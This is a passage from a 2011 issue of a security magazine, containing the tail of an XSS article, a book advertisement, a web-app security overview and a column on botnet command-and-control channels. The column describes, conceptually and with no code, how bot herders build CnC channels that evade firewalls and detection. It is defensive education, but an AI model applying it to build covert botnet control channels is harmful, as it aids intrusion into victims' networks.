site. From this, an attack can bypass client side security
mechanisms and alter access controls to suit their
needs. The three types of XSS attacks are Reflective
(Non-Persistent), Persistent, and DOM-based; the
example used in this article is a Reflective XSS attack.
Reflective XSS attacks are not stored on the server
that is hosting the content but rather by mangling a URL
that will load the given attack once the victim requests
it. These are commonly implemented through posting a
link on a social networking site, or via a message or e-
mail in an attempt to phish something out of the user.
Web Applications:
With the high demand for applications and information, companies
have made data readily and easily available. Web applications, to
keep in touch with friends, download music, or order a new espresso
machine, are used so commonly you seldom think about how the
information is presented to you.
What you will learn
A foundation of how to test and secure your web applications
What you should know
Web Application Development
Basic JavaScript and SQL Commands
Testing and Securing Your Code
Packt is a modern publishing company, producing cutting-
edge books and eBooks for communities of developers,
administrators, and newbies alike. Packt, pronounced Packed,
published its first book Mastering phpMyAdmin for Effective
MySQL Management in April 2004 and has continued to
produce highly specialized books on understanding and
applying IT technologies.
Packt books, eBooks and articles share the experiences of fellow IT professionals in adapting and customizing todays systems,
applications, and frameworks. Their solutions-based books and eBooks give you the knowledge and power to customize
the software and technologies youre using to get the job done. Packt books are more specific and less general than the IT
books you have seen in the past. Packts unique business model allows them to bring you more focused information, giving
you more of what you need to know, and less of what you dont.
Hakin9 subscribers have 30% discount for Packt book! Just find the diccount code in EBOOKS section on
Hakin9 website and enjoy Packt publication in lower price.
Packt has published hundreds of books on a wide range of technologies. One of its recently published is:
BackTrack 4: Assuring Security by Penetration Testing
Master the art of penetration testing with BackTrack
Learn the black-art of penetration testing with in-depth
coverage of BackTrack Linux distribution
Explore the insights and importance of testing your corporate
network systems before hackers strike it
Understand the practical spectrum of security tools by their
exemplary usage, configuration, and benefits

To read more about this book click here.



07/2011 56
ID FRAUD EXPERT SAYS...
An overview of Web Application Security Issues
www.hakin9.org/en 57
W
eb application (referred to as apps) security
is very much in its infancy some security
experts (including myself) believe this is
going to be a major emerging area of technology.
Web apps have been around since 1987 (Larry Wall
developed Perl), so its not really that new. Nowadays
web apps are more complex and are based on a
client-server architecture (Hotmail and Gmail are
good examples). This architecture is evolving and
we see web apps such as Google Apps acting as a
word processor, storing the files and allowing you to
download the file onto your PC. Facebook and the
social web have also moved into Web apps hence the
recent coined phrase Web 3.0.
Web application development tool issues
How many readers do understand why they need
sophisticated web app vulnerability detection tools?
Probably not that many! Being able to detect insecure
or defective lines of code where hackers will look
to exploit is critical in the development of a secure
Web app. This normally occurs when the code is
compiled. Research suggests that vulnerability app
tools are not being used for enhancing code security,
but there is equally an argument against, that Web
app vulnerability tools dont provide complete app
awareness and can only focus on specific code
modules (i.e. UI and DB modules). It is well known
that code scanners dont work well here and bug
tracking systems are currently not/not well integrated,
so that Web developers can detect and track core
vulnerabilities/ erroneous lines of code. Its clear there
are quite a few issues here.
Web application programming development
Web apps are usually coded in multi-languages using a
combination of server and client side scripts. ASP and
PHP is the most common for the server-side (which is
where the real hard work is done) and JavaScript and
HTML at the apps level. Responsive web apps such as
Gmail (which have developed very fast) are thankful
to the development of AJAX (which is a combination
of existing technologies), which is one of the most
advanced programming languages.
AJAX is helping lead the way mainly because it
allows apps/browsers to communicate with a web
server without the need for a client to reload each
page. Firefox for example uses the XMLHttpRequest
object to achieve this, whereas Internet Explorer uses
XMLHTTP. AJAX allows web developers to exchange
data between client and server as if the users had
reloaded the web page.
There is a slight drawback in that the client still has to
send some packets of data to the server so the client
for interpretation which is then converted into Dynamic
HTML which makes the web page interactive. Now, let
us take a look at the persistent JavaScript API threat.
Persistent JavaScript API evercookies
The evercookie is a persistent JavaScript API, which
if you value your privacy, should have an option to be
removed from a browser session strangely it isnt. For
most users they will probably be unaware of this cookie.
Its little understood outside of technical and marketing
circles online advertisers and web app developers are
using evercookies more and more.
The evercookie is stored in multiple data storage
locations on your PC, so its very difficult to completely
remove. Privacy wise, the evercookie can be deleted but
it has an uncanny habit of regenerating itself. It behaves
more like spyware or malware and you may have heard
it referred to as obfuscated code it is delivered as part
of JavaScript, HTTP, Flash, Silverlight, HTML5 DOM
etc so this means the evercookie and its purpose is
completely concealed from you. Is this malicious code?
Probably, but its not illegal for Web app developers or
marketers to use.
AJAX programming security issues
According to OWASP (https://www.owasp.org/index.php
/Main_Page), AJAX does indeed have many security
vulnerabilities that are still to be fully researched. As
discussed above, the XMLHttpRequest object retrieves
information from a Web server which could allow a
SQL injection (SQL statement modification) on the
DB or XSS (injecting malicious content as HTML
or JavaScript code) attacks. JavaScript (users can
control JavaScript requests with a JavaScript blocker
An overview of Web
Application Security Issues
EMERGING THREATS
07/2011 60
Why are there So Many
Command and Control
Channels Part Two
I
n our last conversation we were talking about
Command and Control Channels, or CnCs. I was
going on and on about how we really dont have
that much variety in CnCs, and that we could roughly
categorize them into a few categories by method:
IRC
The classics, some on off ports. Some still using public
IRC networks thinking no one is watching....
Custom Hex Channels
By far the most innovation has happened here in the
last couple years. There are some sub-categories well
discuss later as well. Lots of variety!
HTTP
Definitely the bulk of CnC channels fall into this category.
Its easy to get data out of a network and blend in with
the deluge of normal traffic. Many challenges here for
detection, but not a great deal of extremely interesting
new stuff.
Peer to Peer
Storm and the like. Great way to distribute and
anonymize as well as resist takedown. Starting to
wane though, very noisy and doesnt get you out of the
corporate net easily.
Covert Channels
This is an expanding category considering how much
espionage goes on and how sophisticated the nation-
state defenses have gotten.
Extreme amounts of variety, but frankly less than Id
have expected by now.
At least what we know about... Can include everything
from ICMP payload channels to using USB sticks to
evade air-gapped networks.
Five general categories, and well talk about each
category and cover some examples in the next few
articles here. But first, there are a few traits of a CnC
channel we should keep in mind as we discuss.
They have to accomplish a few general goals to be
useful.
Be able to get out of a natted network
Get through a firewall
Receive commands
Return information
Remain undetected
Allow a botherder to manage hundreds or
thousands at a time, as well as individuals
Relatively simple things, but challenging in practice. So
today lets talk about IRC. This is by far the oldest CnC
type. Back then the bot herder didnt have to worry
about being undetected, or even really about firewalls.
No one was watching for them, so they could operate
as they pleased. So you have a group of geeks that
decide to build a botnet-like thing, so they use the most
familiar thing they have to control it, IRC. The original
chat protocol. Bots require very little intelligence to
interact with an IRC server. You connect, login, nick,
join a room and youre good. The bot can then just
take the conversation in the room as commands and
return results. The bot herder can give commands
to their entire fleet at once, and not really have to do
much administrative junk to make it happen.
Things got more sophisticated over time adding
password protection to rooms, bots that would require
encrypted or obfuscated commands in the channel, or
that would respond to only certain nicks for commands.
Then they moved to non-standard ports for IRC when
we suddenly got security-minded and added block rules
for IRC in these new firewall things we decided we
might want to try using. But overall it was a quick easy
way to run a net.
IRC is still being used. Here is an example
conversation from a sample that came through our
sandnet just a few days ago:
:irc.<redacted>.org NOTICE AUTH :*** Looking up your
hostname...
In the next issue of
magazine:
If you would like to contact Hakin9 team, just send an email to
en@hakin9.org. We will reply a.s.a.p.
RFID
Available to download
on July 30th
Soon in Hakin9!
Security Coding, BitCoin, DDOS, SQL Injection, Stuxnet, Hacking Facebook, Port scanner, IP
scanners, ISMS, Security Policy, Data Recovery, Data Protection Act, Single Sign On, Standards and
Certificates, Biometrics, E-discovery, Identity Management, SSL Certificate, Data Loss Prevention,
Sharepoint Security, Wordpress Security

You might also like